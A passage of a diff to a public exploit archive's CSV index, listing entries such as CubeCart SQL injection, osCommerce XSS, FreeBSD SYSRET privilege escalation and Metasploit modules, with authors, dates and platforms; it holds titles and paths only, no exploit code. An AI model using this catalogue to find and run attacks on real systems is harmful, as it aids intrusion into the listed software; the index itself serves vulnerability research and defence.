Salehi",php,webapps,0 +28657,platforms/linux/local/28657.c,"glibc and eglibc 2.5_ 2.7_ 2.13 - Buffer Overflow Vulnerability",2013-09-30,"Hector Marco and Ismael Ripoll",linux,local,0 28661,platforms/php/webapps/28661.txt,"ToendaCMS 1.0.4 Media.PHP Directory Traversal Vulnerability",2006-09-24,MoHaJaLi,php,webapps,0 28662,platforms/php/webapps/28662.txt,"PhotoStore details.php gid Parameter XSS",2006-09-25,meto5757,php,webapps,0 28663,platforms/php/webapps/28663.txt,"PhotoStore view_photog.php photogid Parameter XSS",2006-09-25,meto5757,php,webapps,0 @@ -25676,6 +25730,8 @@ id,file,description,date,author,platform,type,port 28674,platforms/php/webapps/28674.pl,"Back-End CMS 0.4.5 admin/index.php includes_path Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 28675,platforms/php/webapps/28675.txt,"Back-End CMS 0.4.5 Facts.php includes_path Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 28676,platforms/php/webapps/28676.txt,"Back-End CMS 0.4.5 - search.php includes_path Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 +28725,platforms/multiple/remote/28725.txt,"SAP Internet Transaction Server 6.10/6.20 - Cross-Site Scripting Vulnerability",2006-09-28,"ILION Research",multiple,remote,0 +28726,platforms/multiple/dos/28726.pl,"OpenSSL SSLv2 - Null Pointer Dereference Client Denial of Service Vulnerability",2006-09-28,"Noam Rathaus",multiple,dos,0 28679,platforms/multiple/dos/28679.txt,"Evince PDF Reader - 2.32.0.145 (Windows) and 3.4.0 (Linux) - Denial of Service",2013-10-02,Deva,multiple,dos,0 28680,platforms/linux/local/28680.txt,"PinApp Mail-SeCure 3.70 - Access Control Failure",2013-10-02,"Core Security",linux,local,0 28681,platforms/windows/remote/28681.rb,"freeFTPd PASS Command Buffer Overflow",2013-10-02,metasploit,windows,remote,21 @@ -25691,17 +25747,21 @@ id,file,description,date,author,platform,type,port 28691,platforms/php/webapps/28691.txt,"Quickblogger 1.4 - Remote File Include Vulnerability",2006-09-25,You_You,php,webapps,0 28692,platforms/php/webapps/28692.txt,"Phoenix Evolution CMS index.php Multiple Parameter XSS",2006-09-26,Root3r_H3ll,php,webapps,0 28693,platforms/php/webapps/28693.txt,"Phoenix Evolution CMS modules/pageedit/index.php pageid Parameter XSS",2006-09-26,Root3r_H3ll,php,webapps,0 -28694,platforms/php/webapps/28694.txt,"VBulletin 2.3.x Global.PHP SQL Injection Vulnerability",2006-09-26,"HACKERS PAL",php,webapps,0 -28695,platforms/php/webapps/28695.txt,"CubeCart 3.0.x admin/forgot_pass.php user_name Parameter SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 -28696,platforms/php/webapps/28696.txt,"CubeCart 3.0.x view_order.php order_id Parameter SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 -28697,platforms/php/webapps/28697.txt,"CubeCart 3.0.x view_doc.php view_doc Parameter SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 -28698,platforms/php/webapps/28698.txt,"CubeCart 3.0.x admin/print_order.php order_id Parameter SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 -28699,platforms/php/webapps/28699.txt,"CubeCart 3.0.x /admin/print_order.php order_id Parameter XSS",2006-09-26,"HACKERS PAL",php,webapps,0 -28700,platforms/php/webapps/28700.txt,"CubeCart 3.0.x view_order.php order_id Parameter XSS",2006-09-26,"HACKERS PAL",php,webapps,0 28701,platforms/php/webapps/28701.txt,"CubeCart 3.0.x /admin/nav.php Multiple Parameter XSS",2006-09-26,"HACKERS PAL",php,webapps,0 28702,platforms/php/webapps/28702.txt,"CubeCart 3.0.x /admin/image.php image Parameter XSS",2006-09-26,"HACKERS PAL",php,webapps,0 28703,platforms/php/webapps/28703.txt,"CubeCart 3.0.x /admin/header.inc.php Multiple Parameter XSS",2006-09-26,"HACKERS PAL",php,webapps,0 28704,platforms/php/webapps/28704.txt,"CubeCart 3.0.x /footer.inc.php la_pow_by Parameter XSS",2006-09-26,"HACKERS PAL",php,webapps,0 +28729,platforms/php/webapps/28729.txt,"PhpBB XS 0.58 - Multiple Remote File Include Vulnerabilities",2006-09-30,xoron,php,webapps,0 +28730,platforms/php/webapps/28730.txt,"OlateDownload 3.4 details.php page Parameter SQL Injection",2006-09-29,Hessam-x,php,webapps,0 +28727,platforms/php/webapps/28727.txt,"Les Visiteurs 2.0 - Multiple Remote File Include Vulnerabilities",2006-09-28,D_7J,php,webapps,0 +28731,platforms/php/webapps/28731.txt,"OlateDownload 3.4 - search.php query Parameter SQL Injection",2006-09-29,Hessam-x,php,webapps,0 +28732,platforms/php/webapps/28732.txt,"Yblog funk.php id Parameter XSS",2006-09-30,You_You,php,webapps,0 +28733,platforms/php/webapps/28733.txt,"Yblog tem.php action Parameter XSS",2006-09-30,You_You,php,webapps,0 +28734,platforms/php/webapps/28734.txt,"Yblog uss.php action Parameter XSS",2006-09-30,You_You,php,webapps,0 +28735,platforms/windows/dos/28735.pl,"MailEnable 2.x SMTP NTLM Authentication Multiple Vulnerabilities",2006-11-29,mu-b,windows,dos,0 +29275,platforms/cgi/webapps/29275.txt,"Netwin SurgeFTP 2.3a1 SurgeFTPMGR.CGI Multiple Input Validation Vulnerabilities",2006-12-11,"Umesh Wanve",cgi,webapps,0 +29276,platforms/asp/webapps/29276.txt,"Lotfian Request For Travel 1.0 ProductDetails.ASP SQL Injection Vulnerability",2006-12-11,ajann,asp,webapps,0 +28728,platforms/php/webapps/28728.txt,"Geotarget Script.PHP Remote File Include Vulnerability",2006-09-29,"RaVeR shi mozi",php,webapps,0 28708,platforms/php/webapps/28708.txt,"elproLOG MONITOR WebAccess 2.1 - Multiple Vulnerabilities",2013-10-04,Vulnerability-Lab,php,webapps,80 28709,platforms/php/webapps/28709.txt,"FlashChat 6.0.2-6.0.8 - Arbitrary File Upload Vulnerability",2013-10-04,x-hayben21,php,webapps,80 28710,platforms/osx/remote/28710.txt,"Skype Technologies Skype 1.5 NSRunAlertPanel Remote Format String Vulnerability",2006-09-26,"Tom Ferris",osx,remote,0 @@ -25709,7 +25769,9 @@ id,file,description,date,author,platform,type,port 28712,platforms/php/webapps/28712.txt,"CMS Formulasi 2.07 - Multiple Vulnerabilities",2013-10-04,"Sarahma Security",php,webapps,80 28713,platforms/php/remote/28713.php,"Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE",2013-10-04,rgod,php,remote,0 28714,platforms/php/webapps/28714.txt,"PHPSelect Web Development Index.PHP3 - Remote File Include Vulnerability",2006-09-27,rUnViRuS,php,webapps,0 +29274,platforms/php/webapps/29274.html,"Horde Groupware Web Mail Edition 5.1.2 - CSRF Vulnerability",2013-10-29,"Marcela Benetrix",php,webapps,80 28716,platforms/php/webapps/28716.txt,"MKPortal 1.0/1.1 PMPopup.PHP Cross-Site Scripting Vulnerability",2006-09-27,HanowarS,php,webapps,0 +29279,platforms/php/webapps/29279.txt,"Olat CMS 7.8.0.1 - Persistent XSS",2013-10-29,Vulnerability-Lab,php,webapps,0 28718,platforms/freebsd/local/28718.c,"FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation Exploit",2013-10-04,CurcolHekerLink,freebsd,local,0 28719,platforms/php/webapps/28719.txt,"VirtueMart Joomla ECommerce Edition 1.0.11 - Multiple Input Validation Vulnerabilities",2006-09-27,"Adrian Castro",php,webapps,0 28720,platforms/php/webapps/28720.txt,"Web//News 1.4 Parser.PHP Remote File Include Vulnerability",2006-09-27,ThE-WoLf-KsA,php,webapps,0 @@ -25717,17 +25779,6 @@ id,file,description,date,author,platform,type,port 28722,platforms/php/webapps/28722.txt,"Red Mombin 0.7 process_login.php Unspecified XSS",2006-09-22,"Armorize Technologies",php,webapps,0 28723,platforms/php/webapps/28723.txt,"Aanval 7.1 build 70151 - Multiple Vulnerabilities",2013-10-04,xistence,php,webapps,80 28724,platforms/windows/remote/28724.rb,"SIEMENS Solid Edge ST4 SEListCtrlX - ActiveX Remote Code Execution",2013-10-04,metasploit,windows,remote,0 -28725,platforms/multiple/remote/28725.txt,"SAP Internet Transaction Server 6.10/6.20 - Cross-Site Scripting Vulnerability",2006-09-28,"ILION Research",multiple,remote,0 -28726,platforms/multiple/dos/28726.pl,"OpenSSL SSLv2 - Null Pointer Dereference Client Denial of Service Vulnerability",2006-09-28,"Noam Rathaus",multiple,dos,0 -28727,platforms/php/webapps/28727.txt,"Les Visiteurs 2.0 - Multiple Remote File Include Vulnerabilities",2006-09-28,D_7J,php,webapps,0 -28728,platforms/php/webapps/28728.txt,"Geotarget Script.PHP Remote File Include Vulnerability",2006-09-29,"RaVeR shi mozi",php,webapps,0 -28729,platforms/php/webapps/28729.txt,"PhpBB XS 0.58 - Multiple Remote File Include Vulnerabilities",2006-09-30,xoron,php,webapps,0 -28730,platforms/php/webapps/28730.txt,"OlateDownload 3.4 details.php page Parameter SQL Injection",2006-09-29,Hessam-x,php,webapps,0 -28731,platforms/php/webapps/28731.txt,"OlateDownload 3.4 - search.php query Parameter SQL Injection",2006-09-29,Hessam-x,php,webapps,0 -28732,platforms/php/webapps/28732.txt,"Yblog funk.php id Parameter XSS",2006-09-30,You_You,php,webapps,0 -28733,platforms/php/webapps/28733.txt,"Yblog tem.php action Parameter XSS",2006-09-30,You_You,php,webapps,0 -28734,platforms/php/webapps/28734.txt,"Yblog uss.php action Parameter XSS",2006-09-30,You_You,php,webapps,0 -28735,platforms/windows/dos/28735.pl,"MailEnable 2.x SMTP NTLM Authentication Multiple Vulnerabilities",2006-11-29,mu-b,windows,dos,0 28736,platforms/php/webapps/28736.txt,"DeluxeBB 1.09 Sig.PHP Remote File Include Vulnerability",2006-10-02,r0ut3r,php,webapps,0 28737,platforms/php/webapps/28737.txt,"PHP Web Scripts Easy Banner Functions.PHP Remote File Include Vulnerability",2006-10-02,"abu ahmed",php,webapps,0 28738,platforms/php/webapps/28738.txt,"Digishop 4.0 Cart.PHP Cross-Site Scripting Vulnerability",2006-10-02,meto5757,php,webapps,0 @@ -25741,9 +25792,6 @@ id,file,description,date,author,platform,type,port 28746,platforms/php/webapps/28746.txt,"osCommerce 2.2 admin/currencies.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 28747,platforms/php/webapps/28747.txt,"osCommerce 2.2 admin/languages.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 28748,platforms/php/webapps/28748.txt,"osCommerce 2.2 admin/manufacturers.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 -28749,platforms/php/webapps/28749.txt,"osCommerce 2.2 admin/newsletters.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 -28750,platforms/php/webapps/28750.txt,"osCommerce 2.2 admin/orders_status.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 -28751,platforms/php/webapps/28751.txt,"osCommerce 2.2 admin/products_attributes.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 28752,platforms/php/webapps/28752.txt,"osCommerce 2.2 admin/products_expected.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 28753,platforms/php/webapps/28753.txt,"osCommerce 2.2 admin/reviews.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 28754,platforms/php/webapps/28754.txt,"osCommerce 2.2 admin/specials.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 @@ -25797,6 +25845,8 @@ id,file,description,date,author,platform,type,port 28802,platforms/php/webapps/28802.txt,"Bloq 0.5.4 files/mainfile.php page[path] Parameter Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0 28803,platforms/php/webapps/28803.txt,"Xoops <= 2.2.3 - Search.PHP Cross-Site Scripting Vulnerability",2006-10-13,b0rizQ,php,webapps,0 28804,platforms/php/webapps/28804.pl,"PHPBB Add Name Module Not_Mem.PHP Remote File Include Vulnerability",2006-10-13,"Nima Salehi",php,webapps,0 +30208,platforms/windows/dos/30208.txt,"IcoFX 2.5.0.0 - (.ico) Buffer Overflow Vulnerability",2013-12-11,"Core Security",windows,dos,0 +29213,platforms/windows/local/29213.pl,"Photodex ProShow Producer 5.0.3310 - Local Buffer Overflow (SEH)",2013-10-26,"Mike Czumak",windows,local,0 28806,platforms/linux/local/28806.txt,"davfs2 1.4.6/1.4.7 - Local Privilege Escalation Exploit",2013-10-08,"Lorenzo Cantoni",linux,local,0 28807,platforms/php/webapps/28807.py,"WHMCS 5.2.7 - SQL Injection Vulnerability",2013-10-08,localhost.re,php,webapps,0 28808,platforms/php/webapps/28808.txt,"Wordpress Quick Contact Form Plugin 6.0 - Persistent XSS",2013-10-08,Zy0d0x,php,webapps,0 @@ -25903,11 +25953,11 @@ id,file,description,date,author,platform,type,port 28909,platforms/php/webapps/28909.txt,"IF-CMS Index.PHP Cross-Site Scripting Vulnerability",2006-11-04,"Benjamin Moss",php,webapps,0 28910,platforms/php/webapps/28910.pl,"PHPKit 1.6.1 Popup.PHP SQL Injection Vulnerability",2006-11-04,x23,php,webapps,0 28911,platforms/solaris/dos/28911.txt,"Sun Solaris 10 UFS Local Denial of Service Vulnerability",2006-11-04,LMH,solaris,dos,0 -28912,platforms/linux/dos/28912.txt,"Linux Kernel 2.6.x ISO9660 - Denial of Service Vulnerability",2006-11-05,LMH,linux,dos,0 28913,platforms/php/webapps/28913.txt,"@cid Stats 2.3 Install.PHP3 - Remote File Include Vulnerability",2006-11-06,Mahmood_ali,php,webapps,0 28914,platforms/php/webapps/28914.txt,"Xoops 2.0.5 NewList.PHP Cross-Site Scripting Vulnerability",2006-11-06,CvIr.System,php,webapps,0 28915,platforms/php/webapps/28915.txt,"Article Script 1.6.3 RSS.PHP SQL Injection Vulnerability",2006-11-06,Liz0ziM,php,webapps,0 28916,platforms/windows/remote/28916.rb,"America Online ICQ 5.1 - ActiveX Control Remote Code Execution Vulnerability",2006-11-06,"Peter Vreugdenhil",windows,remote,0 +28912,platforms/linux/dos/28912.txt,"Linux Kernel 2.6.x ISO9660 - Denial of Service Vulnerability",2006-11-05,LMH,linux,dos,0 28917,platforms/php/webapps/28917.txt,"AIOCP 1.3.x cp_forum_view.php Multiple Parameter XSS",2006-11-06,"laurent gaffie",php,webapps,0 28918,platforms/php/webapps/28918.txt,"AIOCP 1.3.x cp_dpage.php choosed_language Parameter XSS",2006-11-06,"laurent gaffie",php,webapps,0 28919,platforms/php/webapps/28919.txt,"AIOCP 1.3.x cp_show_ec_products.php order_field Parameter XSS",2006-11-06,"laurent gaffie",php,webapps,0 @@ -25947,10 +25997,11 @@ id,file,description,date,author,platform,type,port 28953,platforms/php/webapps/28953.txt,"Bitweaver 1.x blogs/list_blogs.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 28954,platforms/php/webapps/28954.txt,"Bitweaver 1.x fisheye/list_galleries.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 28955,platforms/windows/local/28955.py,"Internet Haut Debit Mobile PCW_MATMARV1.0.0B03 - Buffer Overflow SEH",2013-10-14,metacom,windows,local,0 -28956,platforms/php/webapps/28956.txt,"StatusNet/Laconica 0.7.4, 0.8.2, 0.9.0beta3 - Arbitrary File Reading",2013-10-14,spiderboy,php,webapps,80 +28956,platforms/php/webapps/28956.txt,"StatusNet/Laconica 0.7.4_ 0.8.2_ 0.9.0beta3 - Arbitrary File Reading",2013-10-14,spiderboy,php,webapps,80 28957,platforms/android/dos/28957.txt,"Android Zygote - Socket Vulnerability Fork bomb Attack",2013-10-14,"Luca Verderame",android,dos,0 28959,platforms/php/webapps/28959.txt,"Wordpress Cart66 Plugin 1.5.1.14 - Multiple Vulnerabilities",2013-10-14,absane,php,webapps,80 28960,platforms/php/webapps/28960.py,"aMSN 0.98.9 Web App - Multiple Vulnerabilities",2013-10-14,drone,php,webapps,80 +29086,platforms/asp/webapps/29086.txt,"ActiveNews Manager activenews_view.asp articleID Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 28962,platforms/multiple/remote/28962.rb,"VMware Hyperic HQ Groovy Script-Console Java Execution",2013-10-14,metasploit,multiple,remote,0 28963,platforms/php/webapps/28963.txt,"Bitweaver 1.x fisheye/index.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 28964,platforms/php/webapps/28964.txt,"Bitweaver 1.x wiki/orphan_pages.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 @@ -25960,7 +26011,7 @@ id,file,description,date,author,platform,type,port 28968,platforms/windows/remote/28968.html,"Aladdin Knowledge Systems Ltd. PrivAgent ActiveX Control Overflow",2013-10-15,blake,windows,remote,0 28969,platforms/windows/local/28969.py,"Beetel Connection Manager PCW_BTLINDV1.0.0B04 - SEH Buffer Overflow",2013-10-15,metacom,windows,local,0 28970,platforms/php/webapps/28970.txt,"Dexs PM System Wordpress Plugin - Authenticated Persistent XSS (0day)",2013-10-15,TheXero,php,webapps,80 -28971,platforms/php/webapps/28971.py,"Dolibarr ERP/CMS 3.4.0 (exportcsv.php, sondage param) - SQL Injection",2013-10-15,drone,php,webapps,80 +28971,platforms/php/webapps/28971.py,"Dolibarr ERP/CMS 3.4.0 (exportcsv.php sondage param) - SQL Injection",2013-10-15,drone,php,webapps,80 28972,platforms/unix/webapps/28972.rb,"Zabbix 2.0.8 - SQL Injection and Remote Code Execution",2013-10-15,"Jason Kratzer",unix,webapps,0 28973,platforms/windows/remote/28973.rb,"HP Data Protector Cell Request Service Buffer Overflow",2013-10-15,metasploit,windows,remote,0 28974,platforms/windows/remote/28974.rb,"Microsoft Internet Explorer - CDisplayPointer Use-After-Free (MS13-080)",2013-10-15,metasploit,windows,remote,0 @@ -25986,6 +26037,11 @@ id,file,description,date,author,platform,type,port 28994,platforms/asp/webapps/28994.txt,"INFINICART browsesubcat.asp Multiple Parameter SQL Injection",2006-11-13,"laurent gaffie",asp,webapps,0 28995,platforms/php/webapps/28995.txt,"WebTester 5.x - Multiple Vulnerabilities",2013-10-16,X-Cisadane,php,webapps,80 28996,platforms/windows/shellcode/28996.c,"Messagebox Shellcode (113 bytes) - Any Windows Version",2013-10-16,"Giuseppe D'Amore",windows,shellcode,0 +29151,platforms/asp/webapps/29151.txt,"Link Exchange Lite 1.0 - Multiple SQL Injection Vulnerabilities",2006-11-21,"laurent gaffie",asp,webapps,0 +29152,platforms/asp/webapps/29152.txt,"JiRos Link Manager 1.0 openlink.asp LinkID Parameter SQL Injection",2006-11-21,"laurent gaffie",asp,webapps,0 +29153,platforms/asp/webapps/29153.txt,"JiRos Link Manager 1.0 viewlinks.asp CategoryID Parameter SQL Injection",2006-11-21,"laurent gaffie",asp,webapps,0 +29154,platforms/asp/webapps/29154.txt,"CreaDirectory 1.2 - search.asp category Parameter SQL Injection",2006-11-21,"laurent gaffie",asp,webapps,0 +29155,platforms/asp/webapps/29155.txt,"CreaDirectory 1.2 addlisting.asp cat Parameter XSS",2006-11-21,"laurent gaffie",asp,webapps,0 28998,platforms/php/webapps/28998.txt,"Phpdebug 1.1 Debug_test.PHP Remote File Include Vulnerability",2006-11-12,Firewall,php,webapps,0 28999,platforms/php/webapps/28999.txt,"DirectAdmin 1.28/1.29 CMD_SHOW_RESELLER user Parameter XSS",2006-11-12,"Aria-Security Team",php,webapps,0 29000,platforms/php/webapps/29000.txt,"DirectAdmin 1.28/1.29 CMD_SHOW_USER user Parameter XSS",2006-11-12,"Aria-Security Team",php,webapps,0 @@ -26020,13 +26076,12 @@ id,file,description,date,author,platform,type,port 29030,platforms/asp/webapps/29030.txt,"MGinternet Property Site Manager listings.asp Multiple Parameter SQL Injection",2006-11-14,"laurent gaffie",asp,webapps,0 29031,platforms/asp/webapps/29031.txt,"MGinternet Property Site Manager admin_login.asp Multiple Field SQL Injection",2006-11-14,"laurent gaffie",asp,webapps,0 29032,platforms/windows/remote/29032.txt,"Conxint FTP 2.2.603 - Multiple Directory Traversal Vulnerabilities",2006-11-15,"Greg Linares",windows,remote,0 -29033,platforms/linux/remote/29033.html,"Links, ELinks 'smbclient' Remote Command Execution Vulnerability",2006-11-18,"Teemu Salmela",linux,remote,0 +29033,platforms/linux/remote/29033.html,"Links_ ELinks 'smbclient' Remote Command Execution Vulnerability",2006-11-18,"Teemu Salmela",linux,remote,0 29034,platforms/multiple/webapps/29034.txt,"Elite Graphix ElitCMS 1.01 & PRO - Multiple Web Vulnerabilities",2013-10-18,Vulnerability-Lab,multiple,webapps,0 29035,platforms/windows/remote/29035.rb,"SikaBoom - Remote Buffer Overflow",2013-10-18,Asesino04,windows,remote,0 29036,platforms/windows/dos/29036.pl,"Teamtek Universal FTP Server Multiple Commands Remote Denial of Service Vulnerabilities",2006-11-15,"Praveen Darhanam",windows,dos,0 29037,platforms/asp/webapps/29037.txt,"CandyPress Store 3.5.2 14 openPolicy.asp policy Parameter SQL Injection",2006-11-15,"laurent gaffie",asp,webapps,0 29038,platforms/asp/webapps/29038.txt,"CandyPress Store 3.5.2 14 prodList.asp brand Parameter SQL Injection",2006-11-15,"laurent gaffie",asp,webapps,0 -29039,platforms/windows/dos/29039.py,"Kerio MailServer 5.x/6.x - Remote LDAP Denial of Service Vulnerability",2006-11-15,"Evgeny Legerov",windows,dos,0 29040,platforms/asp/webapps/29040.txt,"High Performance Computers Solutions Shopping Cart Multiple SQL Injection Vulnerabilities",2006-11-14,"laurent gaffie",asp,webapps,0 29041,platforms/asp/webapps/29041.txt,"Yetihost Helm 3.2.10 - Multiple Cross-Site Scripting Vulnerabilities",2006-11-15,"Aria-Security Team",asp,webapps,0 29042,platforms/asp/webapps/29042.txt,"Dragon Internet Events Listing 2.0.01 venue_detail.asp VenueID Parameter SQL Injection",2006-11-15,"Benjamin Moss",asp,webapps,0 @@ -26053,6 +26108,10 @@ id,file,description,date,author,platform,type,port 29063,platforms/asp/webapps/29063.txt,"Xtreme ASP Photo Gallery 2.0 displaypic.asp sortorder Parameter SQL Injection",2006-11-16,"Aria-Security Team",asp,webapps,0 29064,platforms/asp/webapps/29064.txt,"Xtreme ASP Photo Gallery 2.0 displaypic.asp catname Parameter XSS",2006-11-16,"Aria-Security Team",asp,webapps,0 29065,platforms/php/webapps/29065.txt,"WHMCS 5.2.8 - SQL Injection Vulnerability",2013-10-19,g00n,php,webapps,0 +29150,platforms/php/webapps/29150.txt,"WordPress SAICO Theme 1.0-1.0.2 - Arbitrary File Upload Vulnerability",2013-10-24,"Byakuya Kouta",php,webapps,0 +29148,platforms/windows/dos/29148.txt,"ASF Demux for VLC 2.0.x - DoS (POC)",2013-10-23,"Pedro Ribeiro",windows,dos,0 +29221,platforms/cgi/webapps/29221.txt,"BlueSocket BSC 2100 5.0/5.1 Admin.PL Cross-Site Scripting Vulnerability",2006-12-04,"Jesus Olmos Gonzalez",cgi,webapps,0 +29222,platforms/php/webapps/29222.txt,"Cerberus Helpdesk 2.x Spellwin.PHP Cross-Site Scripting Vulnerability",2006-12-04,"En Douli",php,webapps,0 29068,platforms/php/webapps/29068.txt,"WordPress Area53 theme Arbitrary File Upload Vulnerability",2013-10-19,"Byakuya Kouta",php,webapps,80 29069,platforms/windows/local/29069.c,"Computer Associates Personal Firewall 9.0 HIPS Driver (kmxfw.sys) Local Privilege Escalation",2006-11-16,"Ruben Santamarta ",windows,local,0 29070,platforms/windows/local/29070.c,"Computer Associates Personal Firewall 9.0 HIPS Driver (kmxstart.sys) Local Privilege Escalation",2006-11-16,"Ruben Santamarta ",windows,local,0 @@ -26067,15 +26126,17 @@ id,file,description,date,author,platform,type,port 29079,platforms/php/webapps/29079.txt,"VBulletin 3.6.x Admin Control Panel Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2006-11-17,insanity,php,webapps,0 29080,platforms/asp/webapps/29080.txt,"BestWebApp Dating Site Login Component Multiple Field SQL Injection",2006-11-17,"laurent gaffie",asp,webapps,0 29081,platforms/asp/webapps/29081.txt,"BestWebApp Dating Site login_form.asp msg Parameter XSS",2006-11-17,"laurent gaffie",asp,webapps,0 -29083,platforms/windows/remote/29083.txt,"Sage 1.3.x IMG Element Input Validation Vulnerability",2006-09-08,"Kevin Kierznowski",windows,remote,0 -29084,platforms/asp/webapps/29084.txt,"A-Cart Pro 2.0 product.asp productid Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 29085,platforms/asp/webapps/29085.txt,"A-CART 2.0 category.asp catcode Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 -29086,platforms/asp/webapps/29086.txt,"ActiveNews Manager activenews_view.asp articleID Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 +29084,platforms/asp/webapps/29084.txt,"A-Cart Pro 2.0 product.asp productid Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 +29083,platforms/windows/remote/29083.txt,"Sage 1.3.x IMG Element Input Validation Vulnerability",2006-09-08,"Kevin Kierznowski",windows,remote,0 29087,platforms/asp/webapps/29087.txt,"ActiveNews Manager default.asp page Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 29088,platforms/asp/webapps/29088.txt,"ActiveNews Manager activenews_search.asp query Parameter XSS",2006-11-18,"laurent gaffie",asp,webapps,0 29089,platforms/asp/webapps/29089.txt,"Active News Manager activeNews_categories.asp catID Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 29090,platforms/asp/webapps/29090.txt,"Active News Manager activeNews_comments.asp articleID Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 29091,platforms/php/webapps/29091.txt,"ZonPHP 2.25 - Remote Code Execution (RCE) Vulnerability",2013-10-20,"Halim Cruzito",php,webapps,0 +29156,platforms/asp/webapps/29156.txt,"CreaDirectory 1.2 - search.asp search Parameter XSS",2006-11-21,"laurent gaffie",asp,webapps,0 +29211,platforms/php/webapps/29211.txt,"WordPress Curvo Themes - CSRF File Upload Vulnerability",2013-10-26,"Byakuya Kouta",php,webapps,0 +29118,platforms/asp/webapps/29118.txt,"Enthrallweb eClassifieds ad.asp Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29093,platforms/asp/webapps/29093.txt,"Texas Rankem player.asp selPlayer Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0 29094,platforms/asp/webapps/29094.txt,"Texas Rankem tournaments.asp tournament_id Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0 29095,platforms/php/webapps/29095.txt,"Blog:CMS 4.1.3 List.PHP Cross-Site Scripting Vulnerability",2006-11-18,Katatafish,php,webapps,0 @@ -26101,7 +26162,6 @@ id,file,description,date,author,platform,type,port 29115,platforms/asp/webapps/29115.txt,"Grandora Rialto 1.6 - searchkey.asp Keyword Parameter XSS",2006-11-20,"laurent gaffie",asp,webapps,0 29116,platforms/asp/webapps/29116.txt,"Grandora Rialto 1.6 - searchmain.asp cat Parameter XSS",2006-11-20,"laurent gaffie",asp,webapps,0 29117,platforms/asp/webapps/29117.txt,"Grandora Rialto 1.6 forminfo.asp refno Parameter XSS",2006-11-20,"laurent gaffie",asp,webapps,0 -29118,platforms/asp/webapps/29118.txt,"Enthrallweb eClassifieds ad.asp Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29119,platforms/asp/webapps/29119.txt,"Enthrallweb eClassifieds dircat.asp cid Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29120,platforms/asp/webapps/29120.txt,"Enthrallweb eClassifieds dirSub.asp sid Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29121,platforms/asp/webapps/29121.txt,"Enthrallweb eHomes homeDetail.asp AD_ID Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 @@ -26121,30 +26181,30 @@ id,file,description,date,author,platform,type,port 29135,platforms/asp/webapps/29135.txt,"Rapid Classified 3.1 - search.asp SH1 Parameter XSS",2006-11-20,"laurent gaffie",asp,webapps,0 29136,platforms/asp/webapps/29136.txt,"Rapid Classified 3.1 reply.asp Multiple Parameter XSS",2006-11-20,"laurent gaffie",asp,webapps,0 29137,platforms/asp/webapps/29137.txt,"Rapid Classified 3.1 advsearch.asp DoSearch Parameter XSS",2006-11-20,"laurent gaffie",asp,webapps,0 +29157,platforms/php/webapps/29157.txt,"Seditio 1.10 Users.Profile.Inc.PHP SQL Injection Vulnerability",2006-11-21,"Mustafa Can Bjorn",php,webapps,0 +29158,platforms/php/webapps/29158.txt,"CuteNews 1.4.5 show_news.php Query String XSS",2006-11-21,"Alireza Hassani",php,webapps,0 +29159,platforms/php/webapps/29159.txt,"CuteNews 1.4.5 rss.php rss_title Parameter XSS",2006-11-21,"Alireza Hassani",php,webapps,0 +29160,platforms/linux/remote/29160.c,"GNU Tar 1.1x GNUTYPE_NAMES Remote Directory Traversal Vulnerability",2006-11-21,"Teemu Salmela",linux,remote,0 29141,platforms/asp/webapps/29141.txt,"The Classified Ad System 3.0 default.asp Multiple Parameter XSS",2006-11-20,"laurent gaffie",asp,webapps,0 29142,platforms/asp/webapps/29142.txt,"Klf-Realty 2.0 - search_listing.asp Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29143,platforms/asp/webapps/29143.txt,"Klf-Realty 2.0 detail.asp property_id Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29144,platforms/osx/dos/29144.txt,"Apple Mac OS X 10.4.8 UDIF Disk Image Remote Denial of Service Vulnerability",2006-11-20,LMH,osx,dos,0 29145,platforms/php/webapps/29145.txt,"Wabbit PHP Gallery 0.9 Dir Parameter Directory Traversal Vulnerability",2006-11-20,the_Edit0r,php,webapps,0 29146,platforms/windows/remote/29146.c,"Novell Client 4.91 NWSPOOL.DLL Remote Buffer Overflow 